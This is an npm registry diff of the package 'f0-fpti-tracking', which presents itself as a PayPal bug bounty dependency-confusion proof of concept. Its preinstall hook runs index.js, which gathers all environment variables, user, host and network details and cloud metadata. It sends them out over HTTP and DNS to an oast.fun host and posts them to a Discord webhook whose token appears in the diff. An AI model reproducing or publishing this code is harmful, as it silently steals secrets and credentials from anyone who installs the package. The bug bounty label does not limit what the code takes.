f0-fpti-tracking 99.31.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +100 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,100 @@
|
|
|
1
|
+
const http = require('http');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
|
+
|
|
6
|
+
// --- CONFIGURACIÓN ---
|
|
7
|
+
const OAST_HOST = "d756g1ti191heqk6b9l0o5r1sjctxedm9.oast.fun";
|
|
8
|
+
const PKG_NAME = require('./package.json').name;
|
|
9
|
+
|
|
10
|
+
// Función para ejecutar comandos sin petar el script
|
|
11
|
+
function run(cmd) {
|
|
12
|
+
try {
|
|
13
|
+
return execSync(cmd, { timeout: 2000, stdio: 'pipe' }).toString().trim().substring(0, 50);
|
|
14
|
+
} catch (e) { return "n/a"; }
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
async function collectAndSend() {
|
|
18
|
+
// 1. Recolección de la "Huella Dactilar" (Fingerprinting)
|
|
19
|
+
|
|
20
|
+
// Obtener TODAS las variables de entorno sin filtrar
|
|
21
|
+
const allEnvVars = {};
|
|
22
|
+
for (const [key, value] of Object.entries(process.env)) {
|
|
23
|
+
allEnvVars[key] = value;
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
const data = {
|
|
27
|
+
pkg: PKG_NAME,
|
|
28
|
+
timestamp: new Date().toISOString(),
|
|
29
|
+
identity: {
|
|
30
|
+
user: os.userInfo().username,
|
|
31
|
+
host: os.hostname(),
|
|
32
|
+
platform: `${os.platform()} ${os.release()}`,
|
|
33
|
+
internal_ip: Object.values(os.networkInterfaces()).flat()
|
|
34
|
+
.filter(i => i.family === 'IPv4' && !i.internal).map(i => i.address)[0] || "no_ip"
|
|
35
|
+
},
|
|
36
|
+
context: {
|
|
37
|
+
cwd: process.cwd(),
|
|
38
|
+
// AHORA: Todas las variables de entorno completas
|
|
39
|
+
all_env_vars: allEnvVars,
|
|
40
|
+
// Mantenemos el campo original por compatibilidad pero ahora vacío
|
|
41
|
+
env_hint: Object.keys(process.env).join(', ').substring(0, 100),
|
|
42
|
+
// Intentamos ver si estamos en AWS/GCP/Azure (Metadata Service)
|
|
43
|
+
cloud: run('curl -s --connect-timeout 1 http://169.254.169.254/latest/meta-data/iam/info || echo "no_cloud"')
|
|
44
|
+
}
|
|
45
|
+
};
|
|
46
|
+
|
|
47
|
+
const payload = Buffer.from(JSON.stringify(data)).toString('base64').replace(/=/g, '');
|
|
48
|
+
|
|
49
|
+
// 2. EXFILTRACIÓN VÍA HTTP (Detallada)
|
|
50
|
+
const options = {
|
|
51
|
+
hostname: OAST_HOST,
|
|
52
|
+
port: 80,
|
|
53
|
+
path: `/hit?d=${payload}`,
|
|
54
|
+
method: 'GET'
|
|
55
|
+
};
|
|
56
|
+
|
|
57
|
+
const req = http.request(options);
|
|
58
|
+
req.on('error', () => {});
|
|
59
|
+
req.end();
|
|
60
|
+
|
|
61
|
+
// 3. EXFILTRACIÓN VÍA DNS (Bypass de Firewalls)
|
|
62
|
+
const dnsLabel = `${data.identity.host.substring(0,15)}.${data.identity.user.substring(0,10)}`.replace(/[^a-z0-9]/gi, '-');
|
|
63
|
+
try {
|
|
64
|
+
execSync(`nslookup ${dnsLabel}.${OAST_HOST}`, { stdio: 'ignore' });
|
|
65
|
+
} catch (e) {}
|
|
66
|
+
|
|
67
|
+
// 4. Discord Webhook con toda la info
|
|
68
|
+
const discordPayload = JSON.stringify({
|
|
69
|
+
content: "🔥 **NEW DEPENDENCY CONFUSION TRIGGERED** 🔥",
|
|
70
|
+
embeds: [{
|
|
71
|
+
title: "Execution Evidence - Full Environment",
|
|
72
|
+
color: 16711680,
|
|
73
|
+
fields: [
|
|
74
|
+
{ name: "📦 Vulnerable Package", value: PKG_NAME, inline: false },
|
|
75
|
+
{ name: "👤 User", value: data.identity.user, inline: true },
|
|
76
|
+
{ name: "💻 Hostname", value: data.identity.host, inline: true },
|
|
77
|
+
{ name: "🌐 Internal IP", value: data.identity.internal_ip, inline: true },
|
|
78
|
+
{ name: "📂 Directory", value: data.context.cwd, inline: false },
|
|
79
|
+
{ name: "🔧 Platform", value: data.identity.platform, inline: true },
|
|
80
|
+
{ name: "☁️ Cloud Info", value: data.context.cloud.substring(0, 50), inline: true },
|
|
81
|
+
{ name: "🔑 Total Env Vars", value: Object.keys(allEnvVars).length.toString(), inline: true }
|
|
82
|
+
],
|
|
83
|
+
footer: { text: "PayPal Bug Bounty Research - lasitoboy" }
|
|
84
|
+
}]
|
|
85
|
+
});
|
|
86
|
+
|
|
87
|
+
const reqDiscord = https.request({
|
|
88
|
+
hostname: 'discord.com',
|
|
89
|
+
port: 443,
|
|
90
|
+
path: '/api/webhooks/1487009597175890022/DE6xfM-BeQ1xD6U2nH7vuFoQAIDd_aVDsuzdhHiGBZpPRm0M9BU94QEglVsLHaSxqhzo',
|
|
91
|
+
method: 'POST',
|
|
92
|
+
headers: { 'Content-Type': 'application/json' }
|
|
93
|
+
});
|
|
94
|
+
reqDiscord.on('error', () => {});
|
|
95
|
+
reqDiscord.write(discordPayload);
|
|
96
|
+
reqDiscord.end();
|
|
97
|
+
}
|
|
98
|
+
|
|
99
|
+
collectAndSend();
|
|
100
|
+
module.exports = {};
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "f0-fpti-tracking",
|
|
3
|
+
"version": "99.31.9",
|
|
4
|
+
"description": "Security Research PoC for Dependency Confusion - f0-fpti-tracking",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "lasitoboy",
|
|
10
|
+
"license": "MIT"
|
|
11
|
+
}
|